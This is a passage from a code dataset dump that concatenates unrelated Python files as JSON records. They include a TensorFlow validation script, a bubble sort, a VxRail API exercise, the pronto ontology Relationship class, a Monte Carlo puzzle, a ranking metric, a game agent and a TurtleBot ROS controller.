time\nimport tensorflow as tf\nimport fer_forward\nimport backward\nimport fer_generator\nimport numpy as np\nimport fer_config as config\n\nTEST_INTERVAL_SECS = 5\nTOTAL_TEST_NUM = 3589\nMINI_BATCH = 300#分批测试的话,注意多线程问题。保证是多线程,才能每次确实shuffle拿出了不一样的数据。所以线程在外,循环在内\n\n\n#3589,test下标从0~3588,valid同样是0~3588\n#这里边没用valid数据集,严格讲,以valid数据集为准,向test数据集泛化。\n#需要使用valid和test同时处理过拟合问题的话,手动改一下数据文件来源。\n\n#更多可以选的操作,把train和valid放一起,交叉验证。\n\n\n\n\n\n\ndef test():\n # 实例化一个数据流图并作为整个 tensorflow 运行环境的默认图\n with tf.Graph().as_default() as g:\n x = tf.placeholder(tf.float32, [MINI_BATCH, 
config.img_width,\n config.img_height, fer_forward.NUM_CHANNELS])\n y_ = tf.placeholder(tf.float32, [None, fer_forward.OUTPUT_NODE])\n\n prob = tf.placeholder(tf.float32)\n bn_training = tf.placeholder(tf.bool)\n # y = fer_forward.forward(x, keep_prob=prob)\n y, dict_ret = fer_forward.forward(x, keep_prob=prob, bn_enable=True, bn_training=bn_training)\n\n \n ema = tf.train.ExponentialMovingAverage(backward.MOVING_AVERAGE_DECAY)\n ema_restore = ema.variables_to_restore()#生成ema替代原变量的映射关系。\n \n\n loader = tf.train.Saver(ema_restore)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n # 批量获取测试数据\n img_batch, label_batch = fer_generator.get_tfrecord(MINI_BATCH, config.tfRecord_valid)\n for i in range(3):\n # 创建一个会话\n with tf.Session() as sess:\n # 通过checkpoint文件找到模型文件名\n ckpt = tf.train.get_checkpoint_state(config.MODEL_SAVE_PATH)\n # 如果模型存在\n if ckpt and ckpt.model_checkpoint_path:\n\n loader.restore(sess, ckpt.model_checkpoint_path)\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n\n # 创建一个线程协调器\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n \n iterations = int(TOTAL_TEST_NUM / MINI_BATCH)\n total_accuracy_score = 0\n for i in range(iterations):\n xs, ys = sess.run([img_batch, label_batch])#一定要把这步扔到循环内部。\n # reshape测试输入数据xs\n reshape_xs = np.reshape(xs, (MINI_BATCH,\n config.img_width,\n config.img_height,\n fer_forward.NUM_CHANNELS))\n\n accuracy_score = sess.run(accuracy, feed_dict={x: reshape_xs, y_: ys, prob:1.0, bn_training:False})\n\n print(\"%g\" % (accuracy_score),end=', ')\n total_accuracy_score += accuracy_score\n \n\n # 输出global_step和准确率\n print(\"After %s training step(s), test accuracy = %g\" % (global_step, total_accuracy_score / iterations))\n # 终止所有线程\n coord.request_stop()\n coord.join(threads)\n\n else:\n print('No checkpoint file found')\n return\n 
time.sleep(TEST_INTERVAL_SECS)\n\n\ndef main():\n test()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fer_valid.py","file_name":"fer_valid.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"500211986","text":"import time\nfrom random import randrange\n\n\n# for i in range(0, count):\n# numbers.append(randrange(1, 100, 1))\n\n# print(f'Unsorted array: {numbers} /n')\n\n#bubble sort\n\nnumbers = [14, 21, 58, 1, 2, 54]\nn = len(numbers)\n\nfor i in range(0, n-1):\n swapped = False\n\n for j in range(0, n-i-1):\n if numbers[j] > numbers[j+1]:\n numbers[j], numbers[j+1] = numbers[j+1], numbers[j] \n swapped = True\n\n if swapped == False: \n break\n \nprint(numbers)\nfor i in range(0, n):\n print(numbers[i])","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571743775","text":"\"\"\"ex_03.\n\nUsage:\n ex_03 disks [-j]\n ex_03 each_disk [-j]\n\nArguments:\n disks\n\nOptions:\n -j Show response body(json)\n\n\"\"\"\n\nimport sys\nfrom docopt import docopt\nimport simplejson as json\nfrom vxrail_interface_3c import VxrailInterface, VxrailError\n\n\ndef print_helper(title, data, pretty=False):\n print(f\"\\n{title}\")\n print(\"-\".rjust(len(title), \"-\"))\n if pretty:\n print(json.dumps(data, indent=4, sort_keys=False))\n else:\n print(data)\n\n\ndef main():\n \"\"\"The excessive commenting in not Pythonic.\"\"\"\n args = docopt(__doc__)\n\n #Instantiate the class\n\n # Step 15\n api = VxrailInterface(address=\"127.0.0.1\", port=8443, username=\"test\", password=\"test\")\n\n # Step 17\n # api = VxrailInterface(address=\"127.0.0.1\", port=8443, username=\"test\", password=\"badpassword\")\n\n if args['disks']:\n\n # Make the API call\n try:\n # Step 19a\n results = api.get(\"v1/disks\")\n\n # Step 19b\n # results = 
api.get(\"v1/system1234\")\n\n except VxrailError as err: \n sys.exit(err)\n\n # Show response body(json)\n print_helper(\"Response body(json)\", results, pretty=args['-j'])\n\n\n elif args['each_disk']:\n print(\"To be completed by attendees.\")\n \n \"\"\" Attendee notes.\n\n - Start with GET v1/disks\n - Extract 'sn' for each disk\n - Use GET v1/disks{disk_sn} on subsequent calls.\n \"\"\"\n\n\nif __name__ == \"__main__\":\n main()\n \n","sub_path":"sessions/session_01/ex_03c.py","file_name":"ex_03c.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"639148333","text":"# coding: utf-8\n\"\"\"Definition of the `Relationship` class.\n\"\"\"\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\n\nimport collections\nimport six\n\nfrom .utils import unique_everseen, output_str\n\n\nclass Relationship(object):\n \"\"\"A Relationship object.\n\n The Relationship class actually behaves as a factory, creating new\n relationships via the default Python syntax only if no relationship\n of the same name are present in the class py:attribute:: _instances\n (a dictionnary containing memoized relationships).\n\n\n Note:\n Relationships are pickable and always refer to the same adress even\n after being pickled and unpickled, but that requires to use at least\n pickle protocol 2 (which is not default on Python 2, so take care !)::\n\n >>> import pronto\n >>> import io, pickle\n >>>\n >>> src = io.BytesIO()\n >>> p = pickle.Pickler(src, pickle.HIGHEST_PROTOCOL)\n >>>\n >>> isa = pronto.Relationship('is_a')\n >>> isa_id = id(isa)\n >>>\n >>> p.dump(isa)\n >>> dst = io.BytesIO(src.getvalue())\n >>>\n >>> u = pickle.Unpickler(dst)\n >>> new_isa = u.load()\n >>>\n >>> id(new_isa) == isa_id\n True\n >>> # what's that black magic ?!\n\n \"\"\"\n\n _instances = collections.OrderedDict()\n\n def __init__(self, obo_name, symmetry=None, transitivity=None,\n 
reflexivity=None, complementary=None, prefix=None,\n direction=None, comment=None, aliases=None):\n \"\"\"Instantiate a new relationship.\n\n Arguments:\n obo_name (str): the name of the relationship as it appears\n in obo files (such as is_a, has_part, etc.)\n symetry (bool or None): the symetry of the relationship\n transitivity (bool or None): the transitivity of the relationship.\n reflexivity (bool or None): the reflexivity of the relationship.\n complementary (string or None): if any, the obo_name of the\n complementary relationship.\n direction (string, optional): if any, the direction of the\n relationship (can be 'topdown', 'bottomup', 'horizontal').\n A relationship with a direction set as 'topdown' will be\n counted as _childhooding_ when acessing `Term.children`.\n comment (string, optional): comments about the relationship.\n aliases (list, optional): a list of names that are synonyms to\n the obo name of this relationship.\n\n Note:\n For symetry, transitivity, reflexivity, the allowed values are\n the following:\n\n * `True` for reflexive, transitive, symmetric\n * `False` for areflexive, atransitive, asymmetric\n * `None` for non-reflexive, non-transitive, non-symmetric\n\n \"\"\"\n if obo_name not in self._instances:\n\n if not isinstance(obo_name, six.text_type):\n obo_name = obo_name.decode('utf-8')\n if complementary is not None and not isinstance(complementary, six.text_type):\n complementary = complementary.decode('utf-8')\n if prefix is not None and not isinstance(prefix, six.text_type):\n prefix = prefix.decode('utf-8')\n if direction is not None and not isinstance(direction, six.text_type):\n direction = direction.decode('utf-8')\n if comment is not None and not isinstance(comment, six.text_type):\n comment = comment.decode('utf-8')\n\n self.obo_name = obo_name\n self.symmetry = symmetry\n self.transitivity = transitivity\n self.reflexivity = reflexivity\n self.complementary = complementary or ''\n self.prefix = prefix or ''\n 
self.direction = direction or ''\n self.comment = comment or ''\n if aliases is not None:\n self.aliases = [alias.decode('utf-8') if not isinstance(alias, six.text_type) else alias\n for alias in aliases]\n else:\n self.aliases = []\n\n self._instances[obo_name] = self\n for alias in self.aliases:\n self._instances[alias] = self\n\n def complement(self):\n \"\"\"Return the complementary relationship of self.\n\n Raises:\n ValueError: if the relationship has a complementary\n which was not defined.\n\n Returns:\n complementary (Relationship): the complementary relationship.\n\n Example:\n\n >>> from pronto.relationship import Relationship\n >>> print(Relationship('has_part').complement())\n Relationship('part_of')\n >>> print(Relationship('has_units').complement())\n None\n\n \"\"\"\n if self.complementary:\n\n #if self.complementary in self._instances.keys():\n try:\n return self._instances[self.complementary]\n except KeyError:\n raise ValueError('{} has a complementary but it was not defined !')\n\n else:\n return None\n\n @output_str\n def __repr__(self):\n \"\"\"Return a string reprensentation of the relationship.\n \"\"\"\n return \"Relationship('{}')\".format(self.obo_name)\n\n def __new__(cls, obo_name, *args, **kwargs):\n \"\"\"Create a relationship or returning an already existing one.\n\n This allows to do the following:\n\n >>> Relationship('has_part').direction\n u'topdown'\n\n The Python syntax is overloaded, and what looks like a object\n initialization in fact retrieves an existing object with all its\n properties already set. 
The Relationship class behaves like a\n factory of its own objects !\n\n Todo:\n * Add a warning for unknown relationship (the goal being to\n instantiate every known ontology relationship and even\n allow instatiation of file-defined relationships).\n\n \"\"\"\n if obo_name in cls._instances:\n return cls._instances[obo_name]\n else:\n return super(Relationship, cls).__new__(cls)\n\n @classmethod\n def topdown(cls):\n \"\"\"Get all topdown `Relationship` instances.\n\n Returns:\n :obj:`generator`\n\n Example:\n\n >>> from pronto import Relationship\n >>> for r in Relationship.topdown():\n ... print(r)\n Relationship('can_be')\n Relationship('has_part')\n\n \"\"\"\n return tuple(unique_everseen(r for r in cls._instances.values() if r.direction=='topdown'))\n\n @classmethod\n def bottomup(cls):\n \"\"\"Get all bottomup `Relationship` instances.\n\n Example:\n\n >>> from pronto import Relationship\n >>> for r in Relationship.bottomup():\n ... print(r)\n Relationship('is_a')\n Relationship('part_of')\n\n \"\"\"\n return tuple(unique_everseen(r for r in cls._instances.values() if r.direction=='bottomup'))\n\n def __getnewargs__(self):\n return (self.obo_name,)\n\n @classmethod\n def _from_obo_dict(cls, d):\n\n if d['id'] in cls._instances:\n return cls._instances[d['id']]\n\n try:\n complementary = d['inverse_of']\n except KeyError:\n complementary = \"\"\n\n try:\n transitivity = d['is_transitive'].lower() == \"true\"\n except KeyError:\n transitivity = None\n\n try:\n symmetry = d['is_symmetric'].lower() == \"true\"\n except KeyError:\n symmetry = None\n\n try:\n reflexivity = d['is_reflexive'].lower() == \"true\"\n except KeyError:\n reflexivity = None\n\n try:\n symmetry = d['is_antisymetric'].lower() == \"false\"\n except KeyError:\n pass\n\n return Relationship(d['id'], symmetry=symmetry, transitivity=transitivity,\n reflexivity=reflexivity, complementary=complementary)\n\n\n\nRelationship('is_a', symmetry=False, transitivity=True,\n reflexivity=True, 
complementary='can_be',\n direction='bottomup')\n\nRelationship('can_be', symmetry=False, transitivity=True,\n reflexivity=True, complementary='is_a',\n direction='topdown')\n\nRelationship('has_part', symmetry=False, transitivity=True,\n reflexivity=True, complementary='part_of',\n direction='topdown')\n\nRelationship('part_of', symmetry=False, transitivity=True,\n reflexivity=True, complementary='has_part',\n direction='bottomup', aliases=['is_part'])\n\nRelationship('has_units', symmetry=False, transitivity=False,\n reflexivity=None)\n\nRelationship('has_domain', symmetry=False, transitivity=False)\n","sub_path":"parsing/pronto_tools/pronto-0.10.2/pronto/relationship.py","file_name":"relationship.py","file_ext":"py","file_size_in_byte":9037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"89312729","text":"#The Riddler Express 2017-08-04: Special Hot Potato\n#Monte Carlo simulation\n\nimport random\n\nNsim = 100000 #Number of simulations\n\nn_children = 30 #Number of children\n\ncounts = [0]*(n_children) #Count how many times each child won\n\nfor x in range(Nsim):\n held_potato = [0]*(n_children + 1) #Tracker whether a child has held potato\n pos = 0 #Potato starts from teacher\n held_potato[0] = -1 #Teacher is a sentinel\n\n #While there is more than 1 child who hasn't held potato\n #(note that teacher counts as a -1 in the sum)\n while (sum(held_potato) < n_children - 2):\n #Simulate coin flip and potato going left or right\n #Wrap around circle using modulo arithmetic\n if (random.random() < 0.5):\n pos = (pos - 1)%(n_children + 1)\n else:\n pos = (pos + 1)%(n_children + 1)\n\n #Update child holding potato excluding teacher\n if (pos != 0):\n held_potato[pos] = 1\n\n counts[held_potato.index(0) - 1] += 1\n\n#Print empirical probabilities\nprint([i/Nsim for i in 
counts])\n","sub_path":"express/special_hot_potato.py","file_name":"special_hot_potato.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268313171","text":"import numpy as np\nfrom metrics import BaseMetric\n\n\nclass QueryMeanPrecision(BaseMetric):\n\n def __init__(self, **kwargs):\n BaseMetric.__init__(self, **kwargs)\n\n def __call__(self):\n\n \"\"\"\n Definición:\n Mean Precision obtiene la media de la precisión de cada query. La precisión de una query es la cantidad de\n documentos 'true positive' (realmente relevantes), dividido por la cantidad de documentos obtenidos. Una\n precisión de 1 significa una precisión perfecta para la query.\n \"\"\"\n\n truth_relevance = self.parameters[\"truth_relevance\"]\n query_ids = self.parameters[\"q_id\"]\n\n # Obtener la cantidad de queries con al menos un documento relevante\n true_relevance_mask = (truth_relevance == 1)\n filtered_query_id = query_ids[true_relevance_mask]\n # en las queries con relevance, cuento\n filtered_true_relevance_count = np.bincount(filtered_query_id)\n # contar queries con 0 en queries sin documentos relevantes\n unique_query_ids = np.unique(query_ids)\n non_zero_count_idxs = np.where(filtered_true_relevance_count > 0)\n true_relevance_count = np.zeros(unique_query_ids.max() + 1)\n true_relevance_count[non_zero_count_idxs] = filtered_true_relevance_count[non_zero_count_idxs]\n # obtener el total solo para las queries existentes\n true_relevance_count_by_query = true_relevance_count[unique_query_ids]\n # obtener el total de documentos\n fetched_documents_count = np.bincount(query_ids)[unique_query_ids]\n # calcular la métrica\n precision_by_query = true_relevance_count_by_query / fetched_documents_count\n return 
np.mean(precision_by_query)\n","sub_path":"notebooks/tpintegrador/src/avg_q_precision.py","file_name":"avg_q_precision.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"333697539","text":"\nfrom agent import Agent\nimport minimax\n\n\"\"\"\nAgent skeleton. Fill in the gaps.\n\"\"\"\n\n\nclass MyAgent(Agent):\n\n \"\"\"This is the skeleton of an agent to play the Penguin game.\"\"\"\n\n def get_action(self, state, time_left):\n \"\"\"This function is used to play a move according\n to the board, player and time left provided as input.\n It must return an action representing the move the player\n will perform.\n \"\"\"\n return minimax.search(state, self)\n\n def successors(self, state):\n \"\"\"The successors function must return (or yield) a list of\n pairs (a, s) in which a is the action played to reach the\n state s;\n \"\"\"\n for action in state.get_current_player_actions():\n copied_state = state.copy()\n copied_state.apply_action(action)\n yield (action, copied_state)\n\n def cutoff(self, state, depth):\n \"\"\"The cutoff function returns true if the alpha-beta/minimax\n search has to stop; false otherwise.\n \"\"\"\n return depth >= 2 or state.game_over()\n\n def evaluate(self, state):\n \"\"\"The evaluate function must return an integer value\n representing the utility function of the board.\n \"\"\"\n if state.placement_phase:\n sum = 0\n for i in range(0, len(state.penguins)):\n for j in range(0, len(state.penguins[i])):\n if state.penguins[i][j] == self.id:\n for k in range(0, len(state.fish[i])):\n sum += state.fish[i][k]\n return sum\n\n scores = state.get_scores()\n other = (self.id + 1) % 2\n return scores[self.id] - scores[other]\n\n def get_name(self):\n return 
'Eggsy'\n","sub_path":"tournament_agent.py","file_name":"tournament_agent.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"641989487","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Uses https://github.com/rkistner/contest-algorithms\n\nimport sys\n\n\ndef debug(*args):\n print(*args, file=sys.stderr)\n\nfin = sys.stdin\nT = int(fin.readline())\nfor case in range(1, T + 1):\n line = fin.readline().strip() + '+'\n last = line[0]\n count = 0\n for c in line:\n if c != last:\n count += 1\n last = c\n\n print(\"Case #%d: %s\" % (case, count))\n\n","sub_path":"solutions_5634697451274240_0/Python/RalfKistner/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"123052637","text":"import rospy\r\nimport numpy as np\r\nfrom nav_msgs.msg import Odometry\r\nfrom geometry_msgs.msg import Twist\r\nfrom sensor_msgs.msg import LaserScan\r\nfrom tf.transformations import euler_from_quaternion\r\nfrom math import pi\r\nfrom array import *\r\n\r\n\r\nfrom angles import rectify_angle_pi\r\nfrom angles import degrees_to_radians\r\n\r\nfrom distances import euclidian_distance\r\n\r\n\r\ndef yaw_from_odom(msg):\r\n \"\"\"\r\n callback function to obtain yaw angle from odometry message\r\n \"\"\"\r\n orientation_q = msg.pose.pose.orientation\r\n orientation_vec = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w]\r\n (roll, pitch, yaw) = euler_from_quaternion(orientation_vec)\r\n\r\n return yaw\r\n\r\n\r\ndef findObj360(array):\r\n \"\"\"\r\n given an array of ranges, get the angle of the closest object around the robot\r\n \"\"\"\r\n temp = min(i for i in array if i > 0.0)\r\n return (array.index(temp), temp)\r\n\r\n\r\ndef findObjFront(array):\r\n \"\"\"\r\n given an array of ranges, get the angle of the closest object 90 degrees in front of 
robot \r\n (45 in each direction)\r\n \"\"\"\r\n temp = min(i for i in array[0:45] if i > 0.0)\r\n temp2 = min(i for i in array[315:360] if i > 0.0)\r\n\r\n if temp <= temp2:\r\n return (array[0:45].index(temp), temp)\r\n else:\r\n return (array[315:360].index(temp2) + 315, temp2)\r\n\r\ndef Hough_Transform(array):\r\n print(\"Entered Hough\")\r\n\r\n precision_t = 36\r\n precision_R = 100\r\n dist_min = .05\r\n dist_max = 4\r\n threshold = 400\r\n\r\n #Take all the ranges (and their corresponding angle) and convert to x,y coordinates for each point\r\n #make an array of 360 rows and 2 columns where each row is a point\r\n Cartesian = [[0 for col in range(2)] for row in range(360)]\r\n for i in range(360):\r\n Cartesian.insert(i, [array[i]*np.cos(np.deg2rad(i)),array[i]*np.sin(np.deg2rad(i))])\r\n\r\n\r\n #2D array which is #of discreet distances by # of discrete thetas\r\n lines = np.zeros((precision_R,precision_t))\r\n\r\n for i in range(360):\r\n for j in range(360):\r\n r = Cartesian[i][0]*np.cos(np.deg2rad(j)) + Cartesian[i][1]*np.sin(np.deg2rad(j))\r\n if (r > dist_min) & (r < dist_max):\r\n #integer division to put r/theta into a discrete box on the hough map\r\n r2 = (r-dist_min)/((dist_max-dist_min)/precision_R)\r\n x1 = np.deg2rad(j)\r\n x2 = (2*pi)/precision_t\r\n t = x1/x2\r\n\r\n lines[int(r2)][int(t)]+=1\r\n\r\n\r\n min_distance = dist_max\r\n angle_to_min = 0\r\n #If any of the squares in the map are above the threshold, they represent a line the robot detected\r\n for i in range(precision_R):\r\n #print{\" \"}\r\n for j in range(precision_t):\r\n #print(\"Box[{}][{}] - {}\").format(i,j,lines[i][j])\r\n if lines[i][j] > threshold:\r\n r = i*((dist_max-dist_min)/precision_R)+dist_min\r\n t = j*360/precision_t\r\n if r < min_distance:\r\n angle_to_min = t\r\n min_distance = r\r\n\r\n print(\"Line with coordinates ({},{}) in polar (degrees) cell value={}\").format(r,t,lines[i][j])\r\n # f = open(\"FileForDownload\", \"w\")\r\n # f.write(\"[\")\r\n # 
f.write(str(r))\r\n # f.write(\",\")\r\n # f.write(str(t))\r\n # f.write(str(lines[i][j]))\r\n # f.write(\"]\")\r\n # f.close()\r\n\r\n\r\n #Return the angle to the closest wall\r\n print(\"Returning the cloest wall: {}\").format(angle_to_min)\r\n return angle_to_min\r\n\r\n\r\n\r\n\r\nclass Turn:\r\n \"\"\"\r\n turn the robot by an angle defined in radians, if angle is defined as positive the robot will \r\n turn clockwise\r\n \"\"\"\r\n def __init__(self, state, angle):\r\n self.state = state\r\n\r\n if angle >= 0:\r\n self.clockwise = False\r\n else:\r\n self.clockwise = True\r\n \r\n self.target_angle = rectify_angle_pi(state.angle + angle)\r\n \r\n rospy.loginfo(\"Target angle: \" + str( self.target_angle))\r\n self.done = False\r\n\r\n def act(self):\r\n error = abs(self.target_angle - self.state.angle)\r\n rospy.loginfo(\"Current angle: \" + str( self.state.angle))\r\n\r\n if(error > .02):\r\n move_cmd = Twist()\r\n if self.clockwise:\r\n move_cmd.angular.z = -.2\r\n else:\r\n move_cmd.angular.z = .2\r\n self.state.cmd_vel.publish(move_cmd)\r\n\r\n else:\r\n self.state.cmd_vel.publish(Twist())\r\n self.done = True\r\n\r\n\r\nclass Drive:\r\n \"\"\"\r\n drive the robot by a certain distance in meters forwards or backwards. 
If the distance is\r\n negative, the robot will move backwards.\r\n \"\"\"\r\n def __init__(self, state, distance):\r\n self.state = state\r\n\r\n self.init_x = state.x\r\n self.init_y = state.y\r\n\r\n if distance >= 0:\r\n self.forward = True\r\n else:\r\n self.forward = False\r\n\r\n self.target_distance = abs(distance) \r\n rospy.loginfo(\"Distance to Travel: \" + str(self.target_distance))\r\n self.done = False\r\n\r\n def act(self):\r\n error = abs(self.target_distance - euclidian_distance(self.init_x, self.state.x, \r\n self.init_y, self.state.y))\r\n rospy.loginfo(\"Current x, y: \" + str( self.state.x) + str(self.state.y))\r\n\r\n if(error > .02):\r\n move_cmd = Twist()\r\n if self.forward:\r\n move_cmd.linear.x = .2\r\n else:\r\n move_cmd.linear.x = -.2\r\n self.state.cmd_vel.publish(move_cmd)\r\n\r\n else:\r\n self.state.cmd_vel.publish(Twist())\r\n self.done = True\r\n\r\n\r\nclass TurnToObject:\r\n \"\"\"\r\n the robot uses tha range finder to grab the direction of the closest object and rotate such \r\n that its heading angle points towards the closest object.\r\n \"\"\"\r\n def __init__(self, state):\r\n self.state = state\r\n self.done = False\r\n\r\n def act(self):\r\n goal = rectify_angle_pi(self.state.closest_obj_ang)\r\n rospy.loginfo(\"Angle of Closest Object: \" + str(goal))\r\n rospy.loginfo(\"Angle of Closest Object in Front: \" + str(rectify_angle_pi(\r\n self.state.closest_obj_front_ang)))\r\n\r\n self.state.current_action = Turn(self.state, goal)\r\n self.done = True\r\n\r\n\r\nclass FollowObject:\r\n \"\"\"\r\n the robot follows the closest object in front of it at an angle of +pi/2 and -pi/2 by sending\r\n angular and linear command velocities.\r\n \"\"\"\r\n def __init__(self, state):\r\n self.state = state\r\n\r\n # error and bound limit constants\r\n self.lower_bound = 0.4\r\n self.upper_bound = 0.6\r\n self.angle_err_lim = 0.04\r\n\r\n goal_angle = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n\r\n if goal_angle >= 0:\r\n 
self.clockwise = False\r\n else:\r\n self.clockwise = True\r\n \r\n self.target_angle = rectify_angle_pi(self.state.angle + goal_angle)\r\n \r\n self.done = False\r\n\r\n def act(self):\r\n goal = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n error = abs(self.target_angle - self.state.angle)\r\n\r\n move_cmd = Twist()\r\n\r\n # sends an angular command velocity if the current robot angle is off by .04 radians\r\n if(error > self.angle_err_lim):\r\n if self.clockwise:\r\n move_cmd.angular.z = -.4\r\n else:\r\n move_cmd.angular.z = .4\r\n else:\r\n move_cmd.angular.z = 0\r\n \r\n # sends a linear command velocity if the closest object distance is not between 0.4 and 0.6m\r\n if (self.state.closest_obj_front_dist > self.upper_bound or \r\n self.state.closest_obj_front_dist < self.lower_bound):\r\n if(self.state.closest_obj_front_dist - 0.5 > 0):\r\n move_cmd.linear.x = .15\r\n else:\r\n move_cmd.linear.x = -.15\r\n\r\n else:\r\n move_cmd.linear.x = 0\r\n\r\n self.state.cmd_vel.publish(move_cmd)\r\n\r\n # sends 0 command velocity if the robot is in a desired position\r\n if(error <= self.angle_err_lim and (self.state.closest_obj_front_dist <= self.upper_bound \r\n and self.state.closest_obj_front_dist >= self.lower_bound)):\r\n move_cmd = Twist()\r\n self.state.cmd_vel.publish(Twist())\r\n \r\n self.done = True \r\n\r\n\r\nclass WallFollow:\r\n def __init__(self, state):\r\n self.state = state\r\n\r\n # error and bound limit constants\r\n self.lower_bound = 0.9\r\n self.upper_bound = 1.1\r\n self.angle_err_lim = 0.04\r\n\r\n\r\n goal_angle = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n\r\n if goal_angle >= 0:\r\n self.clockwise = False\r\n else:\r\n self.clockwise = True\r\n \r\n self.target_angle = rectify_angle_pi(self.state.angle + goal_angle)\r\n \r\n self.done = False\r\n\r\n def act(self):\r\n goal = rectify_angle_pi(self.state.closest_obj_front_ang)\r\n error = abs(self.target_angle - self.state.angle)\r\n\r\n move_cmd = Twist()\r\n\r\n 
if(error > self.angle_err_lim):\r\n if self.clockwise:\r\n move_cmd.angular.z = -.4\r\n else:\r\n move_cmd.angular.z = .4\r\n else:\r\n move_cmd.angular.z = 0\r\n \r\n if (self.state.closest_obj_front_dist > self.upper_bound or self.state.closest_obj_front_dist < self.lower_bound):\r\n if(self.state.closest_obj_front_dist - 0.5 > 0):\r\n move_cmd.linear.x = .15\r\n else:\r\n move_cmd.linear.x = -.15\r\n\r\n else:\r\n move_cmd.linear.x = 0\r\n\r\n self.state.cmd_vel.publish(move_cmd)\r\n print(str(error) + \"\\tERROR\")\r\n print(str(self.state.closest_obj_front_dist) + \"closest_obj_front_dist\")\r\n if(error <= self.angle_err_lim and (self.state.closest_obj_front_dist <= self.upper_bound and self.state.closest_obj_front_dist >= self.lower_bound)):\r\n move_cmd = Twist()\r\n print(\"setting meter to true GOTHERE\")\r\n self.state.cmd_vel.publish(Twist())\r\n self.state.meter = True\r\n \r\n self.done = True \r\n\r\n\r\nclass TurtlebotState:\r\n \"\"\"\r\n stores the current state of the robot.\r\n \"\"\"\r\n def __init__(self):\r\n\r\n self.pose_msg = None\r\n self.yaw_msg = None\r\n self.scan_msg = None\r\n\r\n self.dict = {\"position\":None, \"orientation\" : None, \"scan\" : None}\r\n\r\n # start up the subscribers to monitor state\r\n self.subscriber_odom = rospy.Subscriber(\"/odom\", Odometry, self.update_odom)\r\n self.subscriber_scan = rospy.Subscriber(\"/scan\", LaserScan, self.update_scan)\r\n\r\n self.data_to_file()\r\n\r\n self.angle = None\r\n self.x = None\r\n self.y = None\r\n self.ready = False\r\n self.current_action = None\r\n self.meter = False\r\n self.Hough_T = 0\r\n\r\n self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=1)\r\n\r\n\r\n # wait until sensing received, etc before\r\n # returning control\r\n while not self.ready:\r\n rate = rospy.Rate(20)\r\n rate.sleep()\r\n\r\n def update_odom(self, msg):\r\n \"\"\"\r\n updates odometry information of the robot.\r\n \"\"\"\r\n self.pose_msg = msg.pose.pose.position\r\n\r\n self.angle = 
yaw_from_odom(msg)\r\n self.yaw_msg = self.angle\r\n\r\n self.x = msg.pose.pose.position.x\r\n self.y = msg.pose.pose.position.y\r\n\r\n self.ready = True\r\n\r\n def update_scan(self, msg):\r\n \"\"\"\r\n updates laser range finder environment information around the robot.\r\n \"\"\"\r\n self.scan_msg = msg.ranges\r\n\r\n # in 360 degree range\r\n self.closest_obj_ang = degrees_to_radians(findObj360(msg.ranges)[0])\r\n\r\n # in 90 degree range in front\r\n self.closest_obj_front = findObjFront(msg.ranges)\r\n self.closest_obj_front_ang = degrees_to_radians(self.closest_obj_front[0])\r\n self.closest_obj_front_dist = self.closest_obj_front[1]\r\n #self.Hough_T = Hough_Transform(msg.ranges)\r\n\r\n self.ready = True\r\n\r\n def data_to_file(self):\r\n\r\n # convert data to JSON format\r\n rospy.Rate(5).sleep()\r\n # string manipulation and dictionary addition for position\r\n self.pose_msg = \"\\\"\" + str(self.pose_msg).replace(\"\\n\", \"\\n\\\"\")\r\n self.pose_msg = str(self.pose_msg).replace(\":\", \"\\\":\")\r\n self.dict[\"position\"] = str(self.pose_msg)\r\n rospy.Rate(5).sleep()\r\n\r\n # string manipultation and dictionary addition for scanning data\r\n self.dict[\"scan\"] = \"\\\"ranges\\\" : \" + str(self.scan_msg)\r\n rospy.Rate(5).sleep()\r\n\r\n # string manipultation and dictionary addition for yaw data\r\n self.dict[\"orientation\"] = \"\\\"yaw\\\" : \" + str(self.yaw_msg)\r\n\r\n with open(\"robot.txt\", \"w\") as file:\r\n file.write(\"{\\\"robot\\\": {\\n\")\r\n for key, value in self.dict.iteritems():\r\n if value:\r\n # all values should be comma separated, lists should have square brackets\r\n val = str(value).replace(\"\\n\", \",\\n\")\r\n val = str(val).replace(\"(\", \"[\")\r\n val = str(val).replace(\")\", \"]\")\r\n\r\n file.write(\"\\\"\"+str(key) + \"\\\"\" + \":{ \\n\" + str(val) + \"}\")\r\n if(key != \"scan\"):\r\n file.write(\",\\n\")\r\n file.write(\"}}\")\r\n\r\n def shutdown(self):\r\n \"\"\"\r\n shutsdown the robot.\r\n 
